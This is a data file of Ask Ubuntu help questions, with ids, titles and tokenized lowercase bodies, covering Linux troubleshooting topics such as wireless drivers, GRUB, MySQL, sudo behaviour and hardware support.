139632	wireless card realtek rtl8723ae-bt is not recognized	i bought a new laptop with a rtl8723ae-bt wireless card , but it seems there is nothing that makes it work . realtek usually makes drivers available for its card , but this specific one does n't have a driver available on realtek 's website . i have tried the following steps in order to try and make it work : installed ndiswrapper versions 1.57 ( from repositories , with dkms ) and 1.58rc1 ( compiled from source from ndiswrapper 's website ) . both failed : version 1.57 does not provide an interface for the functions iowmiopenblock and iowmiqueryalldata . 1.58rc1 has dummy functions in their places , but it fails with a `` ioremap failed '' message . upon further investigation , i have found that the function ndismmapiospace ( ndis.c:808 ) , in 1.58rc1 , gets called with physical address and length zero , which causes the failure . since this function does n't seem to be called from anywhere in ndiswrapper 's code , i 'd assume the windows driver is somehow calling it with bogus parameters . i tried using both the 64-bit version ( on my installed system , which uses the x86_64 version of ubuntu ) and the 32-bit version ( on a live-usb x86 system with persistence enabled ) of the windows xp driver . the same errors occurred for both versions . since realtek 's linux drivers for rtl8192ce/se/de actually mention the 8723 chipset in its sources , i tried compiling them and modprobing them , but they do n't pick up the card id ( 10ec:8723 ) . i also tried to echo 10ec 8723 > new_id on the sysfs ( /sys/bus/pci/drivers/rtl8192de ) location ( of the driver ( actually , on each of them , one at a time ) , but i get a `` permission denied '' error even with sudo . if i sudo su and try again , i get the error bash : echo : write error : invalid argument . i have run out of ideas . it 's really frustrating to buy a new notebook to use only with ubuntu and not be able to use its wi-fi connection . if anyone can shed a light on alternatives , i 'd be very thankful . edit : lshw -c network output $ sudo lshw -c network -numeric *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. [ 10ec:8723 ] vendor : realtek semiconductor co. , ltd. [ 10ec ] physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : ioport : d000 ( size=256 ) memory : f7900000-f7903fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] vendor : realtek semiconductor co. , ltd. [ 10ec ] physical id : 0.2 bus info : pci @ 0000:04:00.2 logical name : eth0 version : 0a serial : 00:90 : f5 : cd:6d : f7 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.0.106 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : c000 ( size=256 ) memory : f2104000-f2104fff memory : f2100000-f2103fff
139636	speed up boot time	in ubuntu `` example '' folder , it shows me that ubuntu is ready to work in just 7 second . how can i make my ubuntu boot as fast as that video ? i tried googling found all around the forum and blog only told me to profiling , add `` profile '' to grub config file and concurency=shell to initrd , remove junks , remove unecessary startup apps ( but i have no startup list yet ) i have tried it all but nothing changes.my ubuntu shows my desktop in 32 second , still same . i have ubuntu 12.04 on acer aspire4739 x86 ( 32bit )
139638	which word processor has best compatibility with the doc ( x ) formats ?	i 'm looking at libreoffice writer , abiword or calligra words . which has the best compatibility with docx/doc format ?
139639	all third-party repositories failing to update ( launchpad and google , especially )	just something that started today , ubuntu repos have been extremely slow ... i ca n't even reliably apt-get update but i solved that by changing the update server , ironically , now i 'm realizing all third-party repos are extremely slow or timing out and failing . anyone else experiencing this ? any suggestions for fixing it ? i am a third-party repo addict so i have quite a few : all launchpad repos failing , google 's , and others . edit : i 've reported here concerning google , not sure where to post for launchpad . i will add , it is hit or miss , i was able to hit launchpad a bit . so my question really is : any launchpad alternatives like there are for changing official update servers as posted above ?
139641	how can i reinstall grub bootloader on mbr after installing kubuntu ?	i installed ubuntu , but then installed kubuntu over it ( formated ubuntu partition ) because ubuntu is not compatible with almost any hardware on my pc . problem is i 'm stuck with an old grub that says ubuntu in the options because in my attempts to make it compatible with my hardware i got an old grub with an image with an earth that says debian . how can i replace the grub with the one kubuntu is supposed to install . i do n't want to modify just the text , or the command to install on /sdax , i want to actually re-write the mbr with the latest grub ( reinstall the bootloader ) . thanks .
139643	update mbr of new drive after cloning	i just cloned the linux partition of my laptop to be used on the desktop . however , this was just a straight dd execution , and the mbr of the new drive is not affected . how can i change the new drive to be bootable ? the exact dd command i used was dd if=/dev/sda5 of=/dev/sdc5
139645	how to save files in pdf format ?	lately i have been having trouble with my libre office ap . i appears that it does n't have anymore the save to pdf command . do you guys know any way around this problem ? i looked around for converters and things like that but no luck . i also check the help and support services with no luck . got any solutions ? thank you .
139648	add custom button to launcher which activates super+w shortcut ?	is there any tool that will allow me place an icon on the launcher similar to workspace switcher , but activate the `` super + w '' command ? 12.04 lts
139654	network connection on ubuntu 12.04 : 20 seconds to load a web site	i am using ubuntu 12.04 on a dell e6520 with intel® core™ i5-2520m cpu @ 2.50ghz × 4 . i use this version since the beta1 . without any troubles . i have enabled all the update repository ( also precise-proposed ) recently , i do n't remember from when , the network connection slowed down . for example it take 20 seconds to load this web site : http : //korben.info/ it 's just incredibly slow . resolving hostnames , getting the page and all his compound resources ( images , scrips , ... ) is slow . it takes about 20 seconds to get the page loaded . i have this issue using either a wifi or a wired connection . thanks for your help , /etienne $ lsb_release -rd description : ubuntu 12.04 lts release : 12.04 $ uname -a linux xxxxxxxx 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux here are the details of my network cards : ( an extract of lshw ) *-network description : ethernet interface produit : 82579lm gigabit network connection fabriquant : intel corporation identifiant matériel : 19 information bus : pci @ 0000:00:19.0 nom logique : eth0 version : 04 numéro de série : d4 : be : d9:1c : eb:61 bits : 32 bits horloge : 33mhz fonctionnalités : pm msi cap_list ethernet physical configuration : broadcast=yes driver=e1000e latency=0 multicast=yes ressources : irq:20 mémoire : e2e00000-e2e1ffff mémoire : e2e80000-e2e80fff porte/s:4080 ( taille=32 ) *-pci:1 description : pci bridge produit : 6 series/c200 series chipset family pci express root port 2 fabriquant : intel corporation identifiant matériel : 1c.1 information bus : pci @ 0000:00:1c.1 version : b4 bits : 32 bits horloge : 33mhz fonctionnalités : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport ressources : irq:17 mémoire : e2d00000-e2dfffff *-network description : interface réseau sans fil produit : centrino advanced-n 6205 fabriquant : intel corporation identifiant matériel : 0 information bus : pci @ 0000:02:00.0 nom logique : wlan0 version : 34 numéro de série : 10:0b : a9:97:9a : d0 bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-24-generic firmware=17.168.5.3 build 42301 ip=192.168.0.10 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn ressources : irq:46 mémoire : e2d00000-e2d01fff here is the google translate version : *-network description : ethernet interface product : 82579lm gigabit network connection manufacturer : intel corporation hardware id : 19 bus information : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial number : d4 : be : d9 : 1c : eb : 61 bits : 32 bits clock : 33mhz capabilities : pm msi cap_list ethernet physical configuration : broadcast = yes driver = e1000e latency = 0 multicast = yes resources : irq : 20 memory : memory e2e00000-e2e1ffff : e2e80000-door e2e80fff / s : 4080 ( size = 32 ) *-pci : 1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 2 manufacturer : intel corporation hardware identifier : 1c.1 bus information : pci @ 0000:00:1 c.1 version : b4 bits : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress bus_master cap_list normal_decode configuration : driver = pcieport resources : irq : 17 memory : e2d00000-e2dfffff *-network description : wireless network interface product : centrino advanced-n 6205 manufacturer : intel corporation hardware identifier : 0 bus information : pci @ 0000:02:00.0 logical name : wlan0 version : 34 serial : 10:0 b : a9 : 97:9 a : d0 bits : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical pciexpress wireless configuration : broadcast = yes driver = iwlwifi driverversion = 3.2.0 firmware-24-generic ip = 17.168.5.3 build 42301 = 192.168.0.10 latency = 0 link = yes multicast = yes wireless = ieee 802.11abgn resources : irq : 46 memory : e2d00000-e2d01fff
139656	boot ubuntu on usb flash drive in mac os x 10.4 ... and ubuntu	i would like to create an os-agnostic installation of ubuntu on a flash drive , that boots under ubuntu and under mac os x . ideally the process would look like : install ubuntu 11.10 ( or 12.04 if necessary ) on a flash drive ( from ubuntu ) . boot from flash drive ( on pc ) to modify files , etc . plug drive into mac with os x 10.4 , boot to ubuntu from it , and use . i have an 8g flash drive . what is the sanest way to do this ?
139662	how to start/stop downloads in azureus ( vuze ) via terminal ?	i need to stop/start download through shell script in azureus ( vuze ) . i know there is cli and i can invoke it as java -jar azureus2-xxx.jar -- ui=console the ? will show a list of commands i can use . to get a list of torrents , show torrents etc . but it is cli . i need shell script to do that so how i can use it to stop/start downloads through shell script ? is there any way to do that ?
139666	print driver is not working for hp4250n	since `` upgrading '' from ubuntu version 11.10 to 12.4 on my t60 , i ca n't get my hp 4250n laser printer to function . i get memory overrun messages printed on the printer instead . this never happened with 11.10 . the printer functions properly using two xp machines ( a t42 and another t60 ) and also using a windows 7 machine ( a new hp laptop ) . i 've see other issues also .
139669	can not install windows	i was previously using ubuntu . now i need to install windows . but windows does not install . what if i click the section , does not accept any . it says on the disc has more than one dynamic unit . a disc does not do any action does not delete any of them except
139671	how do i remove firefox nightly ?	how to remove/uninstall firefox nightly build , i 'm on ubuntu 12.04 . made an error , i 'm supposed to be installing firefox 13 .
139675	ubuntu desktop 12.04 lts does not work with radeon generic pnp display	i have a hp pavillion g6-1330se laptop with intel i5 processor , 6gb ram , radeon generic pnp display and windows 7 home basic version . i have downloaded ubuntu desktop 12.04 lts from the website and have extracted the .iso file on to an external dvd . however , upon trying to boot from dvd , i get a blank screen . also , i tried installing ubuntu using windows installer - while the installation goes through successfully and during booting i get options to select windows 7 or ubuntu , upon selecting ubuntu , i get a blank screen ... . how can i resolve this problem ? thanks in advance .
139684	oracle jdk 7 with maven and eclipse	i 'm running ubuntu 12.04 i know this has been asked many times but i just recently switched to linux and i 'm having a hard time piecing everything together . i have oracle 's jdk 7 running just fine from the command prompt but i 'm not sure what the best way to install eclipse and maven are so that they will use it . last time i tried installing eclipse with apt-get and it ended up installing openjdk6 . how do i go about installing eclipse and maven so that they both are using oracle 7 jdk ? thanks !
139692	is is possible to show the keyboard shortcut for a menu item in the hud ?	when using the hud i think it would be very useful if it displayed the keyboard shortcut for a menu item ( if it has one ) . for example new tab in firefox has the shortcut ctrl+t can the hud be configured to show whether a menu item has a keyboard shortcut , something like the mock-up below :
139698	ubuntu 12.04 lts installer crashes	i am trying to install `` ubuntu-12.04-desktop-i386 '' on my ibm m52 8213-w2b . currently i am using windows 8 consumer preview . i am trying to install `` ubuntu-12.04-desktop-i386 '' by booting directly from usb flash drive . the installer crashes just after creating new partition . the apport report says that there is an error in the system log file which may be due to faulty media .
139702	completely uninstall and reinstall openjdk	i searched askubuntu and tried the suggestions but failed .i try this question : how to completely uninstall/reinstall java 1.i run sudo apt-cache search openjdk get the following : openjdk-6-dbg - java runtime based on openjdk ( debugging symbols ) openjdk-6-demo - java runtime based on openjdk ( demos and examples ) openjdk-6-doc - openjdk development kit ( jdk ) documentation openjdk-6-jdk - openjdk development kit ( jdk ) openjdk-6-jre - openjdk java runtime , using hotspot jit openjdk-6-jre-headless - openjdk java runtime , using hotspot jit ( headless ) openjdk-6-jre-lib - openjdk java runtime ( architecture independent libraries ) openjdk-6-source - openjdk development kit ( jdk ) source files icedtea-7-jre-jamvm - alternative jvm for openjdk , using jamvm openjdk-6-jre-zero - alternative jvm for openjdk , using zero/shark openjdk-7-dbg - java runtime based on openjdk ( debugging symbols ) openjdk-7-demo - java runtime based on openjdk ( demos and examples ) openjdk-7-doc - openjdk development kit ( jdk ) documentation openjdk-7-jdk - openjdk development kit ( jdk ) openjdk-7-jre - openjdk java runtime , using hotspot jit openjdk-7-jre-headless - openjdk java runtime , using hotspot jit ( headless ) openjdk-7-jre-lib - openjdk java runtime ( architecture independent libraries ) openjdk-7-jre-zero - alternative jvm for openjdk , using zero/shark openjdk-7-source - openjdk development kit ( jdk ) source files 2.run sudo apt-get remove openjdk get the following : reading package lists ... done building dependency tree reading state information ... done package openjdk-7-jdk is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 182 not upgraded .
139707	which default programs can be safely uninstalled ?	which programs installed by default in ubuntu are generally regarded as safe to uninstall ? i 'm mostly thinking of things like social networking , e-mail , you know . bonus stuff .
139714	edit gtk theme in ubuntu	how can i edit colors of current theme ? i have bright theme with white windows but i can see black tooltips when i move mouse above firefox ' tabs , or eclipse ide . that 's what i 'd change .
139715	how do i maximize a gnome-terminal that has been minimized ?	how do i maximize a gnome-terminal window that has been minimized ? i do n't see them in the launcher on the left nor the task bar on the top ?
139719	how to disable monitor brightness keys ( dell n4010 ) in 12.04 ?	i want to disable or remap the monitor brightness keys for my dell n4010 as it causes ubuntu 12.04 to freeze on a black screen if i adjust brightness through those keys . please help .
139722	conky not working in gnome 3.4	i 've installed conky using sudo apt-get install conky-all and followed this tutorial to configure . the configuration works properly in unity desktop in ubuntu 12.04 and everything seems ok , however using gnome 3 nothing appears on the desktop . i have used following command to invoke conky at startup sh -c `` sleep 20s ; conky -c ~/.conkyrc '' . please suggest what additional steps need to be taken in order to make it work in gnome shell ubuntu 12.04 . here is the .conkyrc file .
139723	sudo does not ask for password	whenever i issue command sudo apt-get install foo it does not ask for password . is it because of user groups ? how to make it prompt for password ? edit : my sudoers file apple @ ascension : ~ $ sudo cat /etc/sudoers # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # includedir /etc/sudoers.d all all= ( all ) nopasswd : all all all= ( all ) nopasswd : all all all= ( all ) nopasswd : all
139735	what is the difference between virtual terminals and gnome terminals ?	i 'm confused ... there are 3 kinds of terminals i have seen in ubuntu xterm , terminal ( gnome terminal ) , started with ctrl+alt+t and virtual terminals , started with ctrl+alt+f1-f6 why are there many terminals and what is the point of them , especially gnome terminal and virtual terminal ?
139739	change permission of usb drive	i have linked a new usb drive with my system and i am not able to copy any file to it . i tried to change the permission by using below command : /media $ sudo chmod 777 0000-7d6c '' 0000-7d6c '' is the drive name . but it gives below message : chmod : changing permissions of `0000-7d6c ' : read-only file system can anybody help me please .
139742	display dims when not in use and it turns off when not in use or while watching movies	i have ubuntu 11.10 and am using it on dell xps laptop now my problem is that ubuntu does not provide power utility form where i can manage brightness of my screen , when to turn it off , after how much time it should dim ... etc etc . please provide me with some advance power utility where i can manage it all . thanks in advance
139744	unable to download ubuntu latest version	i have ubuntu 10.10 installed on my system . on update manager it is showing that new release 11.04 is available . but when i try to upgrade ubuntu it gives below message : '' authentication failed . authenticating the upgrade failed . there may be problem with the network or server . ''
139747	wifi not working on ubuntu 12.04	my computer is not recognising the wireless nnetwork . when i try to activate my drivers i get the following error message : http : //paste.ubuntu.com/997127/ please help me solve this problem .
139748	information about internet connection in ubuntu 11.10	i use ubuntu 11.10.i surf the internet using gprs connection with my cell phone as modem . how do i get to know the speed at which the internet is running ? i tried clicking on 'connection information ' but it says 'connection speed unknown ' .
139770	what does buildid sha1 mean ?	i was exploring around in the ubuntu unity terminal window when this came up : when i typed : file /bin/ls the output is : /bin/ls : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x214a38d0db472db559f0dabf0ae97f82fea83e03 , stripped i wanted to verify that the sha1 is correct and hence i typed this : openssl sha1 /bin/ls however , the output is as such : sha1 ( /bin/ls ) = 8800fee57584ed1c44b638225c2f1eec818a27c2 while they are of the same length in hexadecimal , they do n't seem to match . did i miss something ? or does the buildid [ sha1 ] refer to something else ?
139774	trying to set a variable in php.ini file under ubuntu 10.10	i 'm trying to set a variable in php.ini file under ubuntu 10.10 . namely the sendmail_path . on my system there are 4 php.ini files : php.ini at /etc/php5/cli/ php.ini-productions at /usr/share/php5/ php.ini-productions.cli at /usr/share/php5/ php.ini-productions-dist at /usr/share/php5/ no other php.ini files are physically in/on my ubuntu 10.10 system . i 've altered all these files with sendmail_path = /usr/sbin/ssmtp -t i 'm testing ssmtp for other reason . starting phpinfo ( ) under apache2 shows the variable sendmail_path still not getting the new value . copy from phpinfo ( ) after restarting apache2 : configuration file ( php.ini ) path /etc/php5/apache2 loaded configuration file ( none ) sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i some more outputs from a terminal window : $ php -- ini configuration file ( php.ini ) path : /etc/php5/cli loaded configuration file : /etc/php5/cli/php.ini scan for additional .ini files in : /etc/php5/cli/conf.d additional .ini files parsed : /etc/php5/cli/conf.d/gd.ini , /etc/php5/cli/conf.d/mcrypt.ini , /etc/php5/cli/conf.d/mysql.ini , /etc/php5/cli/conf.d/mysqli.ini , /etc/php5/cli/conf.d/pdo.ini , /etc/php5/cli/conf.d/pdo_mysql.ini $ php -v php 5.3.3-1ubuntu9.10 with suhosin-patch ( cli ) ( built : feb 11 2012 06:21:15 ) copyright ( c ) 1997-2009 the php group zend engine v2.3.0 , copyright ( c ) 1998-2010 zend technologies i 'm in no way of solving this , and have tried to google for this behavior this weekend with no luck . regards to you if you can solve this , i guess i 'm not the only one having this âissueâ .
139775	photo special effects software	i would like to know about a software for creating special effects on photos just like on http : //avatar.pho.to/ . it is not necessary that it should have all effects . you may even recommend more than one .it can be both free and non-free
139780	pulseaudio : no microphone configuration	updated ubuntu to precise from oneiric on a dell inspirion mini 10 ( with an intel hda-soundcard ) . i ca n't remember having any issues with the microphone . i did n't need it - i tried ekiga the first time in precise . i could n't hear any sound in the echo test of ekiga , so i switched to the `` system preferences '' and looked for the microphone to boost it . surprisingly , the microphone input was greyed out - i could n't mute or unmute , i could n't even move the volume-slider . on the other hand : i could change the microphone-setting on console with alsamixer , so do n't worry about thatâś : ) i just wanted to ask , how to get pulseaudio back to the known , comfortable behaviour . some newbies wo n't know the trick to use alsamixerâś my soundcard ( output of lspci ) : 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) greets !
139783	how does one divert downloads	on a ( not unrelated to my last question ) note , i am 40 % of the way through an iso download , and do not have enough disk space left on the livecd to store it . can i divert it to my external memory ? thanks .
139785	how does one create a bootable sd ?	i am going to be replacing ubuntu 11.10 with 12.04 . can i create a bootable microsd , or do i have to create the image on a cd ?
139786	how to recover a usb stick after ubuntu installation ?	i have created a liveusb-stick with xubuntu 12.04 on it . i installed xubuntu from it on a macbook air . if i now plug in the usb stick , it is not recognized anymore . how can i make it recognized and format it in order to use it again as a normal storage usb stick ?
139791	setting apache2 on ubuntu	i 've followed this tutorial to try and set an apache server : http : //www.ubuntugeek.com/how-to-install-apache2-webserver-with-phpcgi-and-perl-support-in-ubuntu-server.html/comment-page-1 # comments at first i got a message that i could access the server but there was nothing . when i tried the perl example , i got an error saying that the file did n't exist . i toyed with the conf files and now ca n't access the server at all . when i type the address of the server i get a forbidden message . how can i step back my changes ? how can i create the cgi server ?
139793	display / find started applications in unityu ubuntu 12.04	i am new to unity and miss the 'feature ' that when i start a program that runs in the background ( like autokey or wuala ) , i can start them from the dash , but they are nowhere visible ... not in the applist on the left , not in the topmenubar . what am i missing here ? thanks for any help . ray
139796	can not adjust brightness on my packard bell easynote ts11hr-127ge laptop	i am using ubuntu 12.04 lts on my packard bell easynote ts11hr-127ge laptop and i can not adjust the brightness . if i change the slider , the brightness is always at maximum . my laptop is using nvidia optimus and has a integrated intel hd 3000 and a nvidia gt540m graphic card . i already installed the newest bumblebee version but this has also no effect . anyone an idea ? here is the output of lsmod : module size used by bbswitch 13396 0 parport_pc 32866 0 ppdev 17113 0 bnep 18281 2 rfcomm 47604 0 bluetooth 180104 10 bnep , rfcomm binfmt_misc 17540 1 snd_hda_codec_hdmi 32474 1 snd_hda_codec_realtek 223867 1 snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec arc4 12529 2 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event ath9k 132390 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq mac80211 506816 1 ath9k uvcvideo 72627 0 snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videodev 98259 1 uvcvideo soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm psmouse 87692 0 joydev 17693 0 v4l2_compat_ioctl32 17128 1 videodev serio_raw 13211 0 ath9k_common 14053 1 ath9k ath9k_hw 411112 2 ath9k , ath9k_common ath 24067 3 ath9k , ath9k_common , ath9k_hw cfg80211 205544 3 ath9k , mac80211 , ath i915 468651 3 drm_kms_helper 46978 1 i915 drm 242038 4 i915 , drm_kms_helper mei 41616 0 i2c_algo_bit 13423 1 i915 mxm_wmi 12979 0 acer_wmi 28418 0 sparse_keymap 13890 1 acer_wmi video 19596 1 i915 wmi 19256 2 mxm_wmi , acer_wmi mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usbhid 47199 0 hid 99559 1 usbhid tg3 152032 0 sdhci_pci 18826 0 sdhci 33205 1 sdhci_pci
139799	grep for a word in a file and show below and above lines too ?	say i have a file . i want to find a particular word in that file and show the line . is there a way i can do the above , but also include the above and below 10 lines from the result line ? how would i do this using the linux command line ?
139804	enlarge swap partition without disturbing anything !	i 'm having a few issues with 12.04 right now when manipulating large image files , which never used to occur when doing the same with 10.04 . i noticed when i clean-installed that the swap partition it chose for itself was 3gb instead of the 6gb it was when i had 10.04 installed . so if for no other reason than to see if it works i 'm going to take it back up to 6gb , as seems to be recommended given i have 3gb ram . i 've already read the swap-faq , but it does n't address the particular area i 'm interested in given my system is already up and running . my plan is to i boot off the installation cd and run gparted to resize the partitions . currently ~400gb is data in one primary partition , and ubuntu is installed on an extended ~100gb partition where ~97gb is for the system and ~3gb is the swap ( give or take a few gb for unallocated space ) . if i do that , will my installation remain intact or will it break anything ? comparing with windows for example , i know resizing the system partition causes problems !
139810	can i make apps for ubuntu using a windows pc ?	i develop windows software . does anyone know ? how i can make application/software for *buntu using a windows pc ?
139815	twitter client with real time notifications ?	is there a twitter client ( or just a utility ) that pushes real time twitter feed / mentions notifications ? by real time i mean notified as soon as the tweet is posted , like what metrotwit does in windows .
139816	how can i configure cowsay ?	i have installed cowsay and fortune . i want to set my own talks or texts in cowsay . but i ca n't configure it out . when i open terminal there is nothing from cowsay . i want to show cowsay when i start terminal . but this works : hash @ ssl50 : ~ $ cowsay -f tux `` carry on '' < carry on > -- -- -- -- -- \ \ . -- . |o_o | | : _/ | // \ \ ( | | ) /'\_ _/`\ \___ ) = ( ___/
139823	making unity dash open with the last used lens as the active lens	especially with no keyboard shortcuts for custom-installed lenses , i thought it would be nice for the dash to always open the last used lens for me ( instead of the default home/global lens ) . is it possible to achieve this ? generalization : maybe the dash interaction could be enhanced to make it more keyboard-friendly overall . as a keyboard-centric user , i find the following flow slightly irksome : keyboard : : to open the dash via the super key then mouse : : to select the desired lens . ( control-tab is tedious with 10+ lenses installed ) then keyboard : : to type my query then mouse : : to select the desired result . ( cursor keys are difficult when there are a lot of search results ) . just a thought .
139824	how can i get the ubuntuone panel icon starting in the background via my .bashrc	trying to get an indicator working to show ubuntuone progress , like the dropbox one . this helped : is there any way to get an indicator for ubuntu one ? also this http : //www.webupd8.org/2010/10/ubuntu-one-indicator-applet.html actually gave me the command to run - /usr/bin/ubuntuone-indicator however this ties up the terminal so i want to run it in the background and ideally have it in my .bashrc to start on startup . however when i try /usr/bin/ubuntuone-indicator & the indicator comes up ... but the terminal is tied up and does n't return the command prompt . i can interrupt it ( ctrl-c ) and the indicator actually stays , so it seems like the job was actually in the background . stopping it at this point requires a kill command . so how can i get this working in the background ok so that i can add it to my .bashrc shell ? at the command line : if i try /usr/bin/ubuntuone-indicator it starts , but the terminal is hung and indicator gets killed with a ctrl-c if i try /usr/bin/ubuntuone-indicator & it starts the icon indicator but still hangs the terminal . if i ctrl-c , that works ( exits ) and the process is left in the background ( requires kill to stop it ) . this is good ... except that i ca n't `` ctrl-c '' for the .bashrc script .
139831	unable to install ubuntu 12.04	pc configuration intel core i7 3820 ( 3.60 ghz & 10mb cache ) , intel dx79to mother board , 12 gb corsair ( 3 * 4 gb ) xms3 1600mhz ram , amd hd6450 2gb ddr3 graphic card . issue : i downloaded ubuntu 12.04 desktop version ( both 32 & 64 bit ) , burned into optical disk and tried to boot from pc found no display when entering to optical drive boot , after that issue i tried to boot through wubi found that display is comming but unable to understand the display and it is hanging up suspecting graphic card is not detecting by ubuntu . pls do need ful
139833	update problem . strange icon	i do n't know when this appears and what is this : then when i click on that icon its showing this : when i clicking in show updates its bringing window update manager , and there is no new updates . can anyone say what is this ?
139837	wacom bamboo intuos 5 ptk-450 is not detected on ubuntu 11.10	i own a wacom bamboo intuos 5 model ptk 450 and would like to know how i make it work on ubuntu 11.10 . i am a linux newbie , so it would be wonderful to have a step-by-step answer
139843	ubuntu on usb stick with windows installed	can i install ubuntu on usb stick without touching windows hard drive and boot from usb when needed ? i believe i read you must install 'boot ' stuff on computer main hdd ! it defies the need to have it on usb then . i am no ubuntu expert , i am mainly a windows user !
139851	sound is glitching	hi ' i 'm having the issue with audio on my ubuntu . the problem is , when i play some music in any player and i move to another part of track , sound becomes kinda crackling/chopping or something for a while , and them it continues as usual . these artifact is really a problem because it sounds too loud even louder than music . i 've tried to edit /etc/pulse/default.pa and /etc/pulse/daemon.conf files as written here https : //wiki.archlinux.org/index.php/pulseaudio # glitches.2c_skips_or_crackling but that does n't help . also , i have trouble with flash player . when i start playing video , the sound appears with delay about 500 ms . when i stop playing , it sounds for additional ~500 ms. motherboard p8p67 with built-in audio ; ubuntu 12.04 , pulseadio . anyone help ?
139856	backup programs and program data ?	hi askubuntu community , i 'm going to format my hard drive and install a new version of ubuntu . i want to backup some programs , not only sync data , i want to have ready-to-restore apps and their data , also offline . any tool that can help ?
139859	mysql service do not launch	sorry for my english ; i was trying to create db with rake in ror application that has been configured for mysql ( gem installed , settings changed ) . after that attempt mysql-server broke : d @ calister : ~ $ mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) mysqld is not running at all : d @ calister : ~ $ ps aux | grep mysql d 3769 0.0 0.0 4368 832 pts/0 s+ 18:03 0:00 grep -- color=auto mysql and also it does n't seem it would like to run : d @ calister : ~ $ sudo service mysql start start : job failed to start any suggestions ? thanks edit : d @ calister : ~ $ sudo -u mysql mysqld 120520 18:45:11 [ note ] plugin 'federated ' is disabled . mysqld : table 'mysql.plugin ' does n't exist 120520 18:45:11 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 120520 18:45:11 innodb : the innodb memory heap is disabled 120520 18:45:11 innodb : mutexes and rw_locks use gcc atomic builtins 120520 18:45:11 innodb : compressed tables use zlib 1.2.3.4 120520 18:45:11 innodb : initializing buffer pool , size = 128.0m 120520 18:45:11 innodb : completed initialization of buffer pool 120520 18:45:11 innodb : highest supported file format is barracuda . 120520 18:45:12 innodb : waiting for the background threads to start 120520 18:45:13 innodb : 1.1.8 started ; log sequence number 1589459 120520 18:45:13 [ error ] fatal error : ca n't open and lock privilege tables : table 'mysql.host ' does n't exist
139863	is it safe to install applications from ppas ?	i have ubuntu 12.04 lts and would like , for example , to install the mate and cinnamon graphical interfaces . of course , i 'll need to add two ppa 's to my system , in order to install these packages . so , first of all , is it safe to install packages from ppa 's ( for example : mate and cinnamon ) ? once installed , can these packages ( including package upgrades ) conflict with the operating system ?
139866	only i can initiate ubuntu 12.04 in my notebook , only if i place the memory usb with which i installed it	i installed ubuntu 12.04 from a memory usb , but now to be able to initiate my computer i must place the memory usb , if a black screen does not remain with a script blinking . i reinstalled it to see if it was solved but it followed the problem . how can i arrange it ?
139875	how to give access to programs to the guest account ?	i 've got a fresh installation of precise installed , and i installed google chrome from the administrator account . then , when i log into the guest account i want to be able to use chrome , but when i try to start it from unity it does nothing . when trying to launch it from the command line , it gives me the error : failed to move to new pid namespace : operation not permitted . how do i allow access to chrome or other programs like this for the guest account ?
